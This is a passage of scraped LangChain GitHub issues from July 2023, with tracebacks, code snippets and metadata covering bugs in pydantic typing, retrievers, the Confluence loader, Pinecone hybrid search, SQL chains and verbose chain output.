return type(__model_name, __base__, namespace)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/main.py", line 204, in __new__
fields[ann_name] = ModelField.infer(
^^^^^^^^^^^^^^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 488, in infer
return cls(
^^^^
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 419, in __init__
self.prepare()
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 534, in prepare
self._type_analysis()
File "/tmp/8db82251b0e58bc/antenv/lib/python3.11/site-packages/pydantic/fields.py", line 638, in _type_analysis
elif issubclass(origin, Tuple): # type: ignore
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/python/3.11.3/lib/python3.11/typing.py", line 1570, in __subclasscheck__
return issubclass(cls, self.__origin__)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
I am not copying here the app script as the code works locally, I think its something more related to Azure App Service Plan Environment or the venv setup in the yaml file.
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
n/a
### Expected behavior
code should work :) | TypeError: issubclass() arg 1 must be a class when using langchain in azure | https://api.github.com/repos/langchain-ai/langchain/issues/7548/comments | 23 | 2023-07-11T15:57:23Z | 2024-03-13T07:43:44Z | https://github.com/langchain-ai/langchain/issues/7548 | 1,799,257,114 | 7,548 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.229
cannot instantiate VespaRetriever (error that it takes only 1 argument but 4 were given)
rolling version back
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.retrievers.vespa_retriever import VespaRetriever
vespa_query_body = {
"yql": 'select * from abstracts where userQuery() or ({targetHits:1}nearestNeighbor(paragraph_embeddings,q))',
'input.query(q)': 'embed(q)',
'query': 'q',
"hits": '3',
"ranking": "hybrid",
}
vespa_content_field = "paragraph_embeddings"
retriever = VespaRetriever(app=vespa_app, body=vespa_query_body, content_field=vespa_content_field)
### Expected behavior
retriever should instantiate but does not | 0.0.229 VespaRetriver signature broken | https://api.github.com/repos/langchain-ai/langchain/issues/7547/comments | 3 | 2023-07-11T15:41:42Z | 2023-11-01T16:06:35Z | https://github.com/langchain-ai/langchain/issues/7547 | 1,799,224,657 | 7,547 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Accessing many corporate resources requires special authentication, e.g. Kerberos.
The `requests` library supports passing an auth object, e.g.
`requests.get(url, auth=HttpNegotiateAuth(), verify=False)` to use SSPI.
We're able to pass a `requests_wrapper `to `LLMRequestsChain`, but it only allows changing headers, not the actual get method that is used.
### Suggestion:
Allow for more generic generic wrappers to be passed? Allow passing a requests-compatible auth object? | Issue: Passing auth object to LLMRequestsChain | https://api.github.com/repos/langchain-ai/langchain/issues/7542/comments | 0 | 2023-07-11T13:59:38Z | 2023-07-14T12:38:25Z | https://github.com/langchain-ai/langchain/issues/7542 | 1,799,011,449 | 7,542 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to query the documents using the below stack
**Langchain+ embedding tool + vectore store + LLM model**
There are many tools and techniques for this in langchain including **load_qa_chain, RetrievalQA,VectorstoreIndexCreator,ConversationalRetrievalChain**. Those are already giving the good results(Not optimal)
But found one more technique including **VectorStoreInfo,VectorStoreToolkit and vectorstore_agent**
What is the advantage/Importance of this pipeline which using **VectorStoreInfo,VectorStoreToolkit and vectorstore_agent** over the other which doesnt follow this pipeline(use any of **load_qa_chain, RetrievalQA,VectorstoreIndexCreator,ConversationalRetrievalChain**)
### Suggestion:
_No response_ | Importance of VectorStoreToolkit, vectorstore_agent and VectorStoreInfo in document based domain specific question answering | https://api.github.com/repos/langchain-ai/langchain/issues/7539/comments | 6 | 2023-07-11T13:06:13Z | 2023-10-23T16:07:02Z | https://github.com/langchain-ai/langchain/issues/7539 | 1,798,902,303 | 7,539 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python 3.9.12
Langchain 0.0.229
OS Linux Mint 21.1
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I am following this tutorial on structured output https://python.langchain.com/docs/modules/model_io/output_parsers/structured
I am passing my openai API key from config, I have made sure that it is being passed as I can see the output of the `chat_model` instance...
```python
from langchain.output_parsers import StructuredOutputParser, ResponseSchema
from langchain.prompts import PromptTemplate, ChatPromptTemplate, HumanMessagePromptTemplate
from langchain.chat_models import ChatOpenAI
from config import config
response_schemas = [
ResponseSchema(name="answer", description="answer to the user's question"),
ResponseSchema(name="source", description="source used to answer the user's question, should be a website.")
]
output_parser = StructuredOutputParser.from_response_schemas(response_schemas)
format_instructions = output_parser.get_format_instructions()
prompt = PromptTemplate(
template="answer the users question as best as possible.\n{format_instructions}\n{question}",
input_variables=["question"],
partial_variables={"format_instructions": format_instructions}
)
chat_model = ChatOpenAI(temperature=0, openai_api_key=config.OPENAI_API_KEY)
print(chat_model)
prompt = ChatPromptTemplate(
messages=[
HumanMessagePromptTemplate.from_template("answer the users question as best as possible.\n{format_instructions}\n{question}")
],
input_variables=["question"],
partial_variables={"format_instructions": format_instructions}
)
_input = prompt.format_prompt(question="what's the capital of france?")
print(_input.to_messages())
output = chat_model(_input.to_messages())
print(output)
print(output_parser.parse(output.content))
```
### Expected behavior
The expected output of the code should be
```json
{'answer': 'Paris', 'source': 'https://en.wikipedia.org/wiki/Paris'}
``` | openai.error.InvalidRequestError: Resource not found | https://api.github.com/repos/langchain-ai/langchain/issues/7536/comments | 3 | 2023-07-11T12:23:21Z | 2023-10-17T16:05:04Z | https://github.com/langchain-ai/langchain/issues/7536 | 1,798,820,813 | 7,536 |
[
"hwchase17",
"langchain"
]
| ### Feature request
The sql agent should query in a manner that it gets **unique** values as sample data (metadata) instead of all values. Only then will it be able to understand which columns to query from. Otherwise, it might get confused between similar-sounding column names (ex: age, age_group)
### Motivation
Databases are typically very sparse (several columns are null). In such cases, the sql agent will perform poorly. The reason is it uses the InfoSQLDatabaseTool(sql_db_schema) to get all sample rows from the database. If the values are themselves null, then it doesn't get an accurate idea of what each column is supposed to contain. This would affect the query generation and the checking part too.
### Your contribution
I'm not so sure as of now. | Support for sparse tables | https://api.github.com/repos/langchain-ai/langchain/issues/7535/comments | 1 | 2023-07-11T12:18:49Z | 2023-10-17T16:05:09Z | https://github.com/langchain-ai/langchain/issues/7535 | 1,798,812,094 | 7,535 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.219
python 3.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
import os
import openai
import pinecone
from langchain.document_loaders import DirectoryLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import Pinecone
from langchain.llms import OpenAI
from langchain.chains.question_answering import load_qa_chain
directory = '/content/data'
def load_docs(directory):
loader = DirectoryLoader(directory)
documents = loader.load()
return documents
documents = load_docs(directory)
def split_docs(documents, chunk_size=1000, chunk_overlap=20):
text_splitter = RecursiveCharacterTextSplitter(chunk_size=chunk_size, chunk_overlap=chunk_overlap)
docs = text_splitter.split_documents(documents)
return docs
docs = split_docs(documents)
embeddings = OpenAIEmbeddings(model_name="ada")
pinecone.init(
api_key="pinecone api key",
environment="env"
)
index_name = "langchain-demo"
index = Pinecone.from_documents(docs, embeddings, index_name=index_name)
model_name = "gpt-4"
llm = OpenAI(model_name=model_name)
chain = load_qa_chain(llm, chain_type="stuff")
def get_similiar_docs(query, k=2, score=False):
if score:
similar_docs = index.similarity_search_with_score(query, k=k)
else:
similar_docs = index.similarity_search(query, k=k)
return similar_docs
def get_answer(query):
similar_docs = get_similiar_docs(query)
answer = chain.run(input_documents=similar_docs, question=query)
return answer
```
In the above code, If I ask any question it is answered from an outer world other than the document corpus.
### Expected behavior
If I am asked any domain-specific query, it should answer based on the embedded document corpus only. I am not expecting any outer-domain answer.
If the query is not related to the embedded document store, then it shouldn't answer anything, instead of searching and generating the answer from its own base pretrained knowledge. | Generating answers from LLM's pretrianed knowledge base, instead of from the embedded document. | https://api.github.com/repos/langchain-ai/langchain/issues/7532/comments | 6 | 2023-07-11T11:35:56Z | 2023-11-10T16:08:12Z | https://github.com/langchain-ai/langchain/issues/7532 | 1,798,735,631 | 7,532 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to integrate confluence for open ai embedding and vector store using in memory doc-array.
I am sure this must not be issue Langchain but thought of posting here . Any pointer would really appreciated.
I created one free trial version account with atlassian.com and trying one POC with confluence pages.
from langchain.document_loaders import ConfluenceLoader .
loader = ConfluenceLoader(url="https://yogeshdeshmukh.atlassian.net/wiki",
token="XXXX")
documentLoaders = documentLoaders + loader.load(space_key="YYYY", include_attachments=False, limit=10)
As per logs it calls
[https://yogeshdeshmukh.atlassian.net:443](https://yogeshdeshmukh.atlassian.net/) "GET /wiki/rest/api/content?spaceKey=~YYYY&limit=10&status=current&expand=body.storage&type=page HTTP/1.1" 403 None
DEBUG:atlassian.rest_client:HTTP: GET rest/api/content -> 403 Forbidden
DEBUG:atlassian.rest_client:HTTP: Response text -> {"error": "Failed to parse Connect Session Auth Token"}
ERROR:atlassian.confluence:'message'
Traceback (most recent call last):
File "/Users/ydeshmukh/Library/Python/3.9/lib/python/site-packages/atlassian/confluence.py", line 3122, in raise_for_status
error_msg = j["message"]
Any idea do i need to provide some additional parameters . I tried with password but was failing later came to know password base basic auth deprecated hence register for token but that also failing .
### Suggestion:
_No response_ | Issue: ConfluenceLoader 403 Forbidden Failed to parse Connect Session Auth Token | https://api.github.com/repos/langchain-ai/langchain/issues/7531/comments | 3 | 2023-07-11T11:29:58Z | 2023-07-12T06:21:31Z | https://github.com/langchain-ai/langchain/issues/7531 | 1,798,725,077 | 7,531 |
[
"hwchase17",
"langchain"
]
| ### System Info
0.0.228
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code to reproduce:
```
embeddings = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME,
model=OPENAI_EMBEDDING_MODEL_NAME,
chunk_size=1)
# create new index
#pinecone.create_index("langchain-self-retriever-demo", dimension=1536)
vectorstore = Pinecone.from_existing_index(index_name="cubigo", embedding=embeddings, namespace="vwProfilesMetadata")
metadata_field_info = [
AttributeInfo(
name="FirstName",
description="The first name of the resident",
type="string",
),
AttributeInfo(
name="LastName",
description="The last name of the resident",
type="string",
),
AttributeInfo(
name="Gender",
description="The gender of the resident",
type="string",
),
AttributeInfo(
name="Birthdate",
description="The birthdate of the resident or the date the resident was born",
type="Date"
),
AttributeInfo(
name="Birthplace",
description="The birthplace of the resident or the place the resident was born",
type="string"
),
AttributeInfo(
name="Hometown",
description="The town or city where the resident grew up",
type="string"
)
]
document_content_description = "The content of the document describes " \
"a resident of the facility, each document is a resident and it " \
"has all the information about the resident like FirstName," \
"LastName, RoleName, Gender, PhoneNumber, CellPhoneNumber, Address, " \
"Birthdate, Birthplace, Hometown, Education, CollegeName, PastOccupations, " \
"Veteran, NameOfSpouse, ReligiousPreferences, SpokenLanguages, " \
"ActiveLiveDescription, RetiredLiveDescription, Accomplishments, AnniversaryDate, " \
"YourTypicalDay, TalentsAndHobbies, InterestCategories, OtherInterestCategories," \
"FavoriteActor, FavoriteActress, FavoriteAnimal, FavoriteArtist, FavoriteAuthor, " \
"FavoriteBandMusicalArtist, FavoriteBook, FavoriteClimate, FavoriteColor, FavoriteCuisine, " \
"FavoriteDance, FavoriteDessert, FavoriteDrink, FavoriteFood, FavoriteFruit, FavoriteFutureTravelDestination, " \
"FavoriteGame, FavoriteMovie, FavoritePastTravelDestination, FavoriteSeasonOfTheYear, FavoriteSong, FavoriteSport, " \
"FavoriteSportsTeam, FavoriteTvShow, FavoriteVegetable"
user_input = get_text()
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
retriever = SelfQueryRetriever.from_llm(
llm, vectorstore, document_content_description, metadata_field_info, verbose=True, enable_limit=True
)
#response = retriever.get_relevant_documents(user_input)
chain = RetrievalQAWithSourcesChain.from_chain_type(llm=llm,
chain_type="stuff",
retriever=retriever,
return_source_documents=True)
if user_input:
response = chain({"question": user_input})
```
```
Exception:
`
ApiException: (400) Reason: Bad Request HTTP response headers: HTTPHeaderDict({'content-type': 'application/json', 'date': 'Tue, 11 Jul 2023 11:04:33 GMT', 'x-envoy-upstream-service-time': '0', 'content-length': '68', 'server': 'envoy'}) HTTP response body: {"code":3,"message":"$contain is not a valid operator","details":[]
```}`
Question I am asking:
Who is interested in baking?
if I ask:
Who likes baking? Then no errors
### Expected behavior
Should get a clear response or no answer. | $contain is not a valid operator in SelfQueryRetrieval | https://api.github.com/repos/langchain-ai/langchain/issues/7529/comments | 6 | 2023-07-11T11:07:41Z | 2024-03-22T18:02:58Z | https://github.com/langchain-ai/langchain/issues/7529 | 1,798,689,044 | 7,529 |
[
"hwchase17",
"langchain"
]
| ### Using Open source LLM models in SQL Chain
Is it possible to use open source LLM models in SQL chain ?
I have tried using tapex/Flan models in SQL Chain, but getting a serialization error on dict[] classes.
Error:
```
File "pydantic\main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for SQLDatabaseChain
__root__ -> llm
**_value is not a valid dict (type=type_error.dict)_**
```
Are there any samples/snippets are available for using open source LLM models in SQL Chain ?
Sample code snippet I tried that is throwing the error:
```
tokenizer = TapexTokenizer.from_pretrained("microsoft/tapex-base-finetuned-wtq")
model = BartForConditionalGeneration.from_pretrained("microsoft/tapex-base-finetuned-wtq")
chain = SQLDatabaseChain(llm=model, database=db, verbose=True)
chain.run("context query ?")
```
### Suggestion:
_No response_ | Using Open source LLM models in SQL Chain | https://api.github.com/repos/langchain-ai/langchain/issues/7528/comments | 8 | 2023-07-11T10:59:28Z | 2024-02-23T16:08:17Z | https://github.com/langchain-ai/langchain/issues/7528 | 1,798,675,621 | 7,528 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I tested the enable_limit to True and asking thins like
1. Get 3 residents who were born in xxx
2. Get 5 Residens who were bon in xxx
It works pretty well.
However in my use case, users can ask also: List all the residents who were born in xxx.
When questions like this are done, by default it will return only 4 documents and not all.

### Motivation
My use case requires sometimes to list all documents that match the criteria, not only 4.
### Your contribution
I am a beginner in langchain (only used it for 2 months), so not sure where in the code this can be fixed, but with the proper guidance I should be able to contribute (if somebody is willing to guide me) | SelfQueryRetriever, Add option to return all when user asks | https://api.github.com/repos/langchain-ai/langchain/issues/7527/comments | 3 | 2023-07-11T10:21:55Z | 2023-11-20T16:06:02Z | https://github.com/langchain-ai/langchain/issues/7527 | 1,798,612,838 | 7,527 |
[
"hwchase17",
"langchain"
]
| ### System Info
python==3.10
langchain==0.0.169
### Who can help?
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
Steps to reproduce:
1. Open the [example notebook](https://colab.research.google.com/drive/1ut3LVSSxsN_C52Pn1ceqWdHjSzhxuZol?usp=sharing)
2. Replace ```insert API key here```with your API key
3. Run all cells
### Expected behavior
Asynchronously calling the RetrievalQAWithSourcesChain with ```chain_type_kwargs = {"prompt": prompt, "verbose": True}``` should result in the same terminal output as the synchronous version instead of skipping "Prompt after formatting: ..."
```result = chain(query)``` output:
```
> Entering new StuffDocumentsChain chain...
> Entering new LLMChain chain...
Prompt after formatting:
PROMPT_AFTER_FORMATTING
> Finished chain.
> Finished chain.
```
Wrong ```result = await chain.acall(query)``` output:
```
> Entering new StuffDocumentsChain chain...
> Entering new LLMChain chain...
> Finished chain.
> Finished chain.
```
| RetrievalQAWithSourcesChain acall does not write fromatted prompt to terminal if verbose=True | https://api.github.com/repos/langchain-ai/langchain/issues/7526/comments | 3 | 2023-07-11T09:22:43Z | 2023-07-11T11:21:36Z | https://github.com/langchain-ai/langchain/issues/7526 | 1,798,503,336 | 7,526 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain v0.0.229, Python v3.10.12, Ubuntu 20.04.2 LTS
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
I am encountering an issue where the specific name of the current chain is not being displayed in the console output, even though I have set 'verbose=True' in the MultiPromptChain and other Chains. When the program enters a new chain, it only prints 'Entering new chain...' without specifying the name of the chain. This makes it difficult to debug and understand which chain is currently being used. Could you please look into this issue and provide a way to display the name of the current chain in the console output? Thank you.
The output could be
```
> Entering new chain...
> Entering new chain...
lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain.
warnings.warn(
> Finished chain.
math: {'input': 'What is the derivative of a function?'}
> Entering new chain...
Prompt after formatting:
You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question.
Here is a question:
What is the derivative of a function?
> Finished chain.
> Finished chain.
```
### Expected behavior
```
> Entering new MultiPromptChain chain...
> Entering new LLMRouterChain chain...
lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain.
warnings.warn(
> Finished chain.
math: {'input': 'What is the derivative of a function?'}
> Entering new LLMChain[math] chain...
Prompt after formatting:
You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question.
Here is a question:
What is the derivative of a function?
> Finished chain.
> Finished chain.
``` | Specific name of the current chain is not displayed | https://api.github.com/repos/langchain-ai/langchain/issues/7524/comments | 5 | 2023-07-11T08:28:40Z | 2023-07-14T00:14:47Z | https://github.com/langchain-ai/langchain/issues/7524 | 1,798,403,821 | 7,524 |
[
"hwchase17",
"langchain"
]
| ### System Info
0.0.228
### Who can help?
@lbsnrs
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Following tutorial here:
https://python.langchain.com/docs/modules/data_connection/retrievers/integrations/pinecone_hybrid_search
```
bm25_encoder = BM25Encoder().default()
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
retriever = PineconeHybridSearchRetriever(
embeddings=embed, sparse_encoder=bm25_encoder, index="cubigometadatanotindexed"
)
retriever.add_texts(["foo", "bar", "FirstName0003384 is a guy", "FirstName0003381 is a girl"])
result = retriever.get_relevant_documents("Who is FirstName0003381?")
```
I get this error:
```
AttributeError: 'str' object has no attribute 'upsert'
Traceback:
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "C:\Users\xx\repos\xxChatbotv1\app\pages\Pinecone Hybrid Search.py", line 116, in <module>
main()
File "C:\Users\xx\repos\xxChatbotv1\app\pages\Pinecone Hybrid Search.py", line 112, in main
retriever.add_texts(["foo", "bar", "FirstName0003384 is a guy", "hello"])
File "C:\Users\xx\anaconda3\envs\zzChatbotv3\Lib\site-packages\langchain\retrievers\pinecone_hybrid_search.py", line 121, in add_texts
create_index(
File "C:\Users\xx\anaconda3\envs\zzChatbotv3\Lib\site-packages\langchain\retrievers\pinecone_hybrid_search.py", line 98, in create_index
index.upsert(vectors)
^^^^^^^^^^^^
```
### Expected behavior
The texts should be added to the index without error | AttributeError: 'str' object has no attribute 'upsert' in Pinecone Hybrid Search | https://api.github.com/repos/langchain-ai/langchain/issues/7523/comments | 3 | 2023-07-11T08:19:47Z | 2023-10-18T16:06:03Z | https://github.com/langchain-ai/langchain/issues/7523 | 1,798,387,965 | 7,523 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Traceback (most recent call last):
File "D:\EmbeddingsSearch\llm-python\02b_llama_chroma.py", line 2, in <module>
from llama_index import SimpleDirectoryReader, StorageContext, GPTVectorStoreIndex
File "F:\Anaconda\lib\site-packages\llama_index\__init__.py", line 15, in <module>
from llama_index.embeddings.langchain import LangchainEmbedding
File "F:\Anaconda\lib\site-packages\llama_index\embeddings\__init__.py", line 4, in <module>
from llama_index.embeddings.langchain import LangchainEmbedding
File "F:\Anaconda\lib\site-packages\llama_index\embeddings\langchain.py", line 6, in <module>
from langchain.embeddings.base import Embeddings as LCEmbeddings
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\agents\__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\agents\agent.py", line 16, in <module>
from langchain.agents.tools import InvalidTool
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\agents\tools.py", line 8, in <module>
from langchain.tools.base import BaseTool, Tool, tool
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\tools\__init__.py", line 3, in <module>
from langchain.tools.arxiv.tool import ArxivQueryRun
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\tools\arxiv\tool.py", line 12, in <module>
from langchain.utilities.arxiv import ArxivAPIWrapper
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\utilities\__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\utilities\apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\document_loaders\__init__.py", line 44, in <module>
from langchain.document_loaders.embaas import EmbaasBlobLoader, EmbaasLoader
File "C:\Users\Leaper\AppData\Roaming\Python\Python310\site-packages\langchain\document_loaders\embaas.py", line 54, in <module>
class BaseEmbaasLoader(BaseModel):
File "pydantic\main.py", line 204, in pydantic.main.ModelMetaclass.__new__
File "pydantic\fields.py", line 488, in pydantic.fields.ModelField.infer
File "pydantic\fields.py", line 419, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 539, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 801, in pydantic.fields.ModelField.populate_validators
File "pydantic\validators.py", line 696, in find_validators
File "pydantic\validators.py", line 585, in pydantic.validators.make_typeddict_validator
File "pydantic\annotated_types.py", line 35, in pydantic.annotated_types.create_model_from_typeddict
File "pydantic\main.py", line 972, in pydantic.main.create_model
File "pydantic\main.py", line 204, in pydantic.main.ModelMetaclass.__new__
File "pydantic\fields.py", line 488, in pydantic.fields.ModelField.infer
File "pydantic\fields.py", line 419, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 534, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 638, in pydantic.fields.ModelField._type_analysis
File "F:\Anaconda\lib\typing.py", line 1158, in __subclasscheck__
return issubclass(cls, self.__origin__)
TypeError: issubclass() arg 1 must be a class
Process finished with exit code 1
### Suggestion:
_No response_ | TypeError: issubclass() arg 1 must be a class | https://api.github.com/repos/langchain-ai/langchain/issues/7522/comments | 22 | 2023-07-11T07:59:09Z | 2024-04-30T09:28:55Z | https://github.com/langchain-ai/langchain/issues/7522 | 1,798,351,804 | 7,522 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/retrievers/integrations/pinecone_hybrid_search
### Idea or request for content:
Its not clear on this page how to index data in pinecone for hybrid search, I am already indexing like this and it works, but for sparse values and the bm25encoder this is very confusing.
```
df = loadSqlData()
df.to_csv('profiles.csv', index=False)
# Iterate through DataFrame rows
# Time Complexity: O(n), where n is the number of rows in the DataFrame
for _, record in df.iterrows():
start_time = time.time()
# Get metadata for this record
# Time Complexity: O(1)
metadata = {
'IdentityId': str(record['IdentityId'])
}
st.write(f'Time taken for metadata extraction: {time.time() - start_time} seconds')
start_time = time.time()
# Split record text into chunks
# Time Complexity: O(m), where m is the size of the text
record_texts = text_splitter.split_text(record['content'])
st.write(f'Time taken for text splitting: {time.time() - start_time} seconds')
start_time = time.time()
# Create metadata for each chunk
# Time Complexity: O(k), where k is the number of chunks in the text
record_metadatas = [{
"chunk": j, "text": text, **metadata
} for j, text in enumerate(record_texts)]
st.write(f'Time taken for metadata dictionary creation: {time.time() - start_time} seconds')
start_time = time.time()
# Append chunks and metadata to current batches
# Time Complexity: O(1)
texts.extend(record_texts)
metadatas.extend(record_metadatas)
st.write(f'Time taken for data appending: {time.time() - start_time} seconds')
# If batch_limit is reached, upsert vectors
# Time Complexity: Depends on the upsert implementation
if len(texts) >= batch_limit:
start_time = time.time()
ids = [str(uuid4()) for _ in range(len(texts))]
# Simulating embedding and upserting here
Pinecone.from_texts(
texts,
embed,
index_name="xx",
metadatas=metadatas,
namespace="vwProfiles2")
texts = []
metadatas = []
st.write(f'Time taken for vector upsertion (simulated): {time.time() - start_time} seconds')
# Upsert any remaining vectors after the loop
# Time Complexity: Depends on the upsert implementation
if len(texts) > 0:
start_time = time.time()
ids = [str(uuid4()) for _ in range(len(texts))]
# Simulating embedding and upserting here
Pinecone.from_texts(
texts,
embed,
index_name="x",
metadatas=metadatas,
namespace="vwProfiles2")
st.write(f'Time taken for remaining vector upsertion (simulated): {time.time() - start_time} seconds')
st.write('Rows indexed: ', len(df))
``` | Hybrid search indexing how to | https://api.github.com/repos/langchain-ai/langchain/issues/7519/comments | 3 | 2023-07-11T06:48:37Z | 2023-10-28T16:05:35Z | https://github.com/langchain-ai/langchain/issues/7519 | 1,798,231,461 | 7,519 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.228
python 3.11
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I have a pinecone index with information which I upserted from a SQL table like this:
```
df = loadSqlData()
df.to_csv('profiles.csv', index=False)
# Iterate through DataFrame rows
# Time Complexity: O(n), where n is the number of rows in the DataFrame
for _, record in df.iterrows():
start_time = time.time()
# Get metadata for this record
# Time Complexity: O(1)
metadata = {
